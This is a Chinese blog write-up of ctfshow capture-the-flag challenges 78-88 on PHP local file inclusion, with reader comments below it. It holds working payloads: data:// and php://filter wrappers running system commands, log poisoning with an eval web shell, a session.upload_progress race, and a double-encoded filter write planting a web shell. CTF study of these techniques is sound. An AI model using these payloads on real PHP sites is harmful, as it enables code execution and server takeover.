【原创】ctfshow—web入门—文件包含 (78-88)

web78

payload
/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

[huayang]方法二

payload
/?file=php://filter/convert.base64-encode/resource=flag.php

web79

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdubCBmbGFnLnBocCcpOw==

web80—81

?file=/var/log/nginx/access.log

发现可以查看日志,则使用日志包含

<?php eval($_POST[a]);?>

方法二

<?php system('ls');?>

<?php system(‘tac fl0g.php’);?>

web82—86

这题利用利用session.upload_progress进行文件包含

首先写个上传文件

注:记得改url

<!DOCTYPE html>
<html>
<body>
<form action="http://c1506ed9-d1e0-427c-8bb7-35fee4dccad6.chall.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

抓包,改包

PHPSESSID=flag
<?php system('ls');?>

放入intruder

继续抓包

?file=/tmp/sess_flag

写个循环进行爆破

for i in range(100000):
    print(i)

前面抓的那个和这个同时开始爆破

改一下继续

<?php system('cat fl0g.php');?>

web87


这题很像一个比赛的题

将 php://filter/write=convert.base64-decode/resource=123.php进行两次url编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%33%32%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30

然后再content写入经过base64编码过后的一句话 (PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==)
这里content的值前面要加两个字符,因为base64算法解码时是4个byte一组,所以给他增加2个字符 一共8个字符

也可以用蚁剑进行连接

web88

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsg

[/huayang]

==>转载请注明来源哦<==

评论

  1. 头像
    哈哈
    Windows Chrome
    5月前
    2021-9-09 11:15:03

    学习

  2. huayang
    huayang 博主
    Macintosh Chrome
    5月前
    2021-9-08 10:24:33

    有用就行

  3. 头像
    Windows Firefox
    5月前
    2021-9-07 12:14:34

    (☆ω☆)好文

  4. huayang
    huayang 博主
    Macintosh Chrome
    5月前
    2021-8-31 14:34:54

    十年难遇的评论

  5. 头像
    happyfmy
    Windows Chrome
    5月前
    2021-8-30 22:43:44

    感谢楼主提供优质WP

  6. 头像
    echo
    Windows Chrome
    6月前
    2021-8-06 14:33:02

    666

  7. 华扬
    华扬 博主
    11月前
    2021-2-26 10:37:52

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇